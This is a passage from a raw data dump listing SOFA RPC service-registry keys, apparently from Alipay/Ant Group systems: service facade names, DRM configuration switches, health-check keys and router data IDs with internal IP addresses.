FA","com.alipay.finslip.common.service.facade.notify.RemedyNotifyGzoneService:1.0:remedyFinBatch@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardPmtInstructionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:finsign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.college.material.MaterialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditsceneprod.goodsExchangeCompensateTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.biz.event.stub.EventProcessServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cfpcenter.core.service.drm.AppContextDrmResource.ecmPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdatafront.common.service.facade.commonquery.CommonQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.StockModifyAuditManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@cifmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.finpwm:name=com.alipay.metadata.conf.cache.LoadCacheSwitch.loadCaheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.minuteDelayLoad,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.kborderprod.KopOrderSyncService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.sofa.runtime.drm.log4j2LevelDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paymentmng.service.facade.insttrade.InstTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancore.p2p.service.facade.batchtask.api.P2pBatchTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.statistic.api.ProductStatisticQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.aegis.AegisOptHisMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:loginantzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.couponAlipassIdWithActiveUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.213.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydatacore.common.service.facade.RiskCertificateRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icontrol.common.service.facade.executor.ActionProcessExecutorServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","id.dana.bizcenter.common.service.facade.api.BizGoodsTypeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:test-server@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobiledataprod.service.facade.CommunityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.BacktraceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fluxconf.service.facade.ctrl.DataOperateLogService:1.0:fluxconf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpaycore.common.service.facade.BpayAgreementServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.notShowInst,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.katongprod.common.service.facade.management.KatongCmsQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.bizrecon.RefundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbwms.common.service.facade.service.WmsChannelInventoryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.StarWishUnitedDrm.batchResetAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstoreapp.common.service.facade.store.StoreAssetDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.synchronize.SynchronizeContentServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpdcore:name=com.alipay.fin.pdcore.common.util.prodquery.PQDRMConfig.isJsonQuery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydataproc:name=com.alipay.securitydata.runtime.service.integration.zdatacloud.drm.ZdatacloudFuseResource.fused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pccontractprod.common.service.facade.api.template.TemplateCommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.235.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finlinkdata.common.service.facade.cooperation.service.CooperationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:lendweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.88.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.175.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","YamlTestApi10Service:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fundmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaybuserviceAuthTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.opssla.common.service.facade.MetaQueryFacade:1.0:iopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_10.15.231.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ialicore:name=com.ipay.ialicore.common.drm.RegionStatusSwitch.offlineTenantRegionConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.bizfundprod.common.service.facade.transfer.BatchTransRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.ipay.icertifycore.service.facade.api.biz.CertificateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.malgo.common.facade.OraConstraintSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.apis.IdempotentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@antmobilecloudtest#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.kbomp.common.service.facade.manager.api.GroupInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.checker.ProdtransCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.chaos.dig.facade.calendar.HaCalendarFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.167.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.application:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.68.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.menu.MenuFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.ArDataServerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectprod.biz.service.schudeler.RuleExecutionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.ReleasePlanDetailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.abilitycore.facade.api.JsApiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ebppgw.facade.callback.IndustrygwMessageBizProcessCallback:1.0:vehownerprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.ProjectDeliverReportFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openitemcore.common.service.facade.api.management.DataMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.inner.GiftCrowdGzReceiveService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.biz.relation.DataCleanService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstrategycenter.common.service.facade.CommonAuditTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditMarketFatigueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.fcrcportal.rcportalDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtrade.common.service.facade.api.FundQuickTransferFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.RpcSpi:1.0:iotcms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.artweb.artCase.facade.CaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.210.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.channelspop.service.decision.channel.ChannelRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.voucher.VcpChangeCodeManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.SecurityPolicyService:1.0:securitycorepolicy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservecenter.facade.api.AllocateOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.article.search.facade.ArticleSearchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.OrgManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airmng.common.service.facade.account.AirAccountRelationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instsign.common.service.facade.account.FundAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payline.biz.shared.msg.DispatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.RoleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.aliminiabilityprod.facade.api.BundleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:cifmngTagDisapproval@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.notice.NoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.0.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.gfas:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.data.process.facade.temp.DataProcessTempQueryService:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.BizPlatformInquiryFacade:1.0:inquiryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CREDIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchasset.common.service.facade.common.AssetMallItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprod.service.PcreditKbActivityInvolvementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-auditprod-gatherData#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.164.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@lifecore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.securitycore.common.service.facade.channel.spi.ChannelMobileAckCodeSendService:1.0:mobileic-mock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auditprod.common.service.facade.fund.api.OuterCheckQueryFacade:1.0:auditprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.VenueDataResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.AutoInsLiability4MngCicadaFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_MFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ecoqltprod.core.service.eco.EcoTinyappDetectSerialDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloancommon.common.service.facade.arrealm.credit.api.CreditAuthQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipayment.service.facade.slip.api.SlipService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.rybInventoryTightAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.SpOperatorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.MrpcSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.flashcheck.common.service.facade.api.FlashcheckFundCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrecon.api.InsReconProdBizInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.distribution.channel.api.DistributionFloorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.blockchain.mypointsprod.core.service.MsgBrokerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.product.SceneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gftax@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dms.common.service.DmsDeployService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finhadecision.common.service.facade.api.LocationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.workflow.InvestFlowQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.task.facade.TaskJobServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.zdatacontextLoadTestTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zarkcenter.common.service.api.AssetDataService:1.0:zarkService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmobilemarket.common.service.facade.api.JCMSConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.serverlesspaasswitch.ServerlessPaasSwitchFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:recommendFeeDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.acbsbcore.common.service.facade.AliyunPopApiConfigFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.acctrans.service.facade.AccountTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.community.CommunityServiceApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.common.service.facade.ArCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_GFTAX#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.testcenter.devapi.facade.ToolActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.merchantsettle.service.common.facade.factoring.McSettleB2GGsummayQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprerec.service.RuleGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dataquality:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.fullStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.secdatacontext.common.facade.api.manage.DataAssetsVOMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","HEALTHY_V2@mobilelbs#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_100.83.128.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insttrade:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.smartcacheUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.common.service.facade.trade.FintradeOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:basement@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.MenuItemManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.bizSceneWithUserIdSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iexclienttrdcenter.service.facade.api.ClientTradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.ordercore.OrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartscene.common.facade.schedule.PlanWorkScheduleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteduprod.common.service.facade.api.RecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.merchant.RelationChangeLogService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dchainabsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filebridge.service.facade.api.FileSftpWhiteListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.yunyou.facade.IterationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfaccenter.facade.api.SubLedgerBalanceAdjustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_MQ_TEST_3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:publichome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.needPostZongshu,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.share.PortfolioProfitQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antqnamesrv:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdistinguish.common.service.facade.ArPlatformGZoneRecServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsaleprod.common.service.facade.api.ApiQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.charge.addp_tddl_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antaid.common.service.facade.api.AntaidAcctransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.api.MobileProgressService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.globalSyncOperatorLimitOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.device.message.manager.DeviceMessageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.content.service.PcreditPromoContentServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthmarket.common.service.facade.service.Double11ActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.PropertyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseamng.common.service.facade.MerchantArInfoSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.exception.CommonExceptionDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.247.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:monitorprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.lifemsgprod.common.service.facade.single.LifeSingleMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:offlineRefundApplyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_GMCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.iacctrans.service.facade.api.v3.AccountTransFacadeV3:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.83.68.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.financingcore.financing.facade.query.FinancingDetailQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.OperatorFacade:1.0:iam@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimdecision.common.service.InsAttachmentDecisionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.YebAssetQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.remit.RemitRevokeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcprod.common.service.facade.CommunityIsvFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@pcreditbatch#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.itemcore.common.service.facade.v2.ItemConsistentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:csmobilebff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphaq.common.facade.label.api.ITaskSampleReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.maxGeneratorLoadNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.decision.DecisionConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inscontentprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.conn.CacheConn:1.0:0000000023@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:changeBind_sim@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finecorisk.common.facade.service.api.query.YebsTransferOutBatchQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:infosectask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:auth-fail-func@DEFAULT#@#DEFAULT_INSTANCE_ID#@#